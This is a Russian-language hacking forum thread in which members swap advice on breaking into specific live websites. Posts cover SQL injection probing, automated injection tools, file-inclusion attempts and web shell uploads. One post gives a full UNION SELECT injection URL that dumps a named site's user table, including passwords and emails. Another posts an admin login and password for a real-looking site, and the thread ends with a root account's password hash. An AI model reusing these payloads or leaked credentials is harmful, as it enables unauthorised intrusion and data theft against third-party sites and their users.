Ваши вопросы по уязвимостям.

pinch

если система linux то попробуй записать в папке /tmp
думаю права хватит

 

tmp хорошо, но никак не задействовать допустим шелл из этой папки... если не ошибаюсь только при помощи локального инклуда.

 

сканируй директории сайта IntelliTamper-ом

 

является ли уязвимым сайт, выдающий на кавычку в первом случае:

во втором случае:

???

 

DrakonSerg а кто его знает то? были пару экстрасенсов на ачате, да некоторые в бане от Егорыча так как постоянно его пароль узнавали, а некоторые еще не знают что они экстрасенсы...
У меня машина не едет, как ты думаешь что в ней сломалось?

 

машина не едет, значит что то сломано. То есть осталось поломку только найти, то что она есть уже железно.
По выдачи этих ошибок возможность инъекции не определить? А как можно определить? Очень сайт нужен тот...

 

news.php?id=1
news.php?id=2-1 если выдается та же страница что и при id=1 то уязвимость есть

 

это точно? Выдается та же страница. Чем эту уязвимость можно крутонуть автоматически?
Вы звиняйте за нубские вопросы. Никогда как то не приходилось с sql плотно стыкаться.

 

1) содержимое страницы не должно изменяться (картинки соответственно).
2) sipt 4.0
pangolin
sqlhelper
toolza

 

Code:

http://www.mustad.no/catalog/products.php?id=

Это PHP-инъекция? Можно ли как нибудь залить шелл?

 

sqlihelper 2.7 выдал:

я так понял нужно брутить названия колонок в таблице. Как?

 

CyberHunter, да, это инклуд, но, скорее всего, файл для инклуда берется из поля БД, id которого - твой GET параметр.
DrakonSerg, да, надо брутить, т.к., судя по логам, ветка 4-я, в которой нету information_schema.

 

mailbrush, т.е. вот так:

Code:

http://www.mustad.no/catalog/products.php?id=adress_gde_shell

но так появляется ошибка (та же самая). Пробовал подставлять нулл байт, не помогло.

 

не факт что там allow_url_include=on
не факт что там magic_quotes_gpc=off (попробуй вместо нулл байта ?)

 

Работа SQLI Helper V 2.7

вывод этого же хелпера:

чем брутить таблицу? Как до нее вообще добраться?

 

А ничего, что там инклуда вообще нет? Что бы ни ставилии в id, в ошибке оно не инклудится

 

Не могу залить шелл.

админка:http://zoor.biz/user/

Username:zbo_admin
password:shaka13

 

Не могу залить шелл.

http://zoor.biz/company.php?cn=ARSHAD+RASHEED+MUGHAL+PLASTIC+STORE&id=-6019+union+select+1,2,3,concat_ws(0x3a,uid,
name,
pass,
mail,
mode,
sort,
threshold,
theme,
signature,
signature_format,
created,
access,
login,
status,
timezone,
language,
picture,
init,
data),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+hashoo_zbo.users+limit+1,1+--+

 

В ПМ кинул!!

 

Блин, ну натолкните на идею или статью... Я уже задолбался.
Вытащил имя и версию дб. Колонки нужно брутить, как их брутить я вообще хз.
Pangolin.Pro.v3.0.0.1011 выдал мне имена колонок каких то, но как оттуда данные вытащить я тоже не пойму. По какому мне запросу гуглить, чтобы вникнуть в ситуацию?

ЗЫ кто хочет помочь, посмотрите два мои поста выше, понятней будет

НАпротив акка root вот такой хеш: 3649d1fc783e0b49